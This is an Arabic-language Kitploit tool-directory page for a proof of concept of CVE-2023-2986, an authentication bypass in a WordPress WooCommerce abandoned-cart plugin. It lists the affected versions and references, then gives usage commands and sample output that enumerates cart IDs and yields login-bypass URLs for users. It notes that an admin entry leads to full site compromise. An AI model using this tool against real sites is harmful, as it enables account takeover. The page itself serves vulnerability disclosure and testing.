Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-2986 — إثبات المفهوم للثغرة CVE-2023-2986 في إضافة 'Abandoned Cart Lite for WooCommerce' في ووردبريس | Kitploit
أدوات/GitHubGitHub/ayantaker/cve-2023-2986
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubayantaker/cve-2023-2986

CVE-2023-2986

إثبات المفهوم للثغرة CVE-2023-2986 في إضافة 'Abandoned Cart Lite for WooCommerce' في ووردبريس

عرض المستودع
63منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الإثبات الأصلي للمفهوم لـ CVE-2023-2986

إثبات المفهوم للثغرة CVE-2023-2986 في إضافة 'Abandoned Cart Lite for WooCommerce' في ووردبريس

التفاصيل ذات الصلة

  • رابط NVD : https://nvd.nist.gov/vuln/detail/CVE-2023-2986
  • مصدر الإضافة : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
  • الإصدارات المعرضة للخطر : version <= 5.14.2 version <= 5.15.1
  • الإصدار المصحح : 5.15.0 5.15.2

تحديث

  • كان يُعتقد أن الإصدار 5.15.0 يصلح المشكلة لكنني اكتشفت أنه لم يتم إصلاحها بالكامل وتم تحديث نفس الشيء. لذا فإن الإصدار المصحح الفعلي هو 5.15.2

تحليل الثغرة

  • مدونة Keysight : https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
  • موقع Medium : https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

الاستخدام

root@kitploit:~
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
root@kitploit:~
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5

إدخال الرابط في المتصفح سيمنحك الوصول إلى حساب المستخدم المعني. إذا كان مستخدم المشرف في ووردبريس نفسه لديه إدخال، فسيؤدي ذلك إلى الوصول إلى لوحة تحكم المشرف مما يؤدي إلى اختراق كامل لخادم ووردبريس.

إخلاء مسؤولية

تم إنشاء هذا الإثبات التجريبي (POC) لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا في حالة التصريح بذلك صراحةً. المؤلف غير مسؤول عن أي إساءة استخدام لهذا الإثبات التجريبي. استخدمه بمسؤولية.

تنزيل الأداة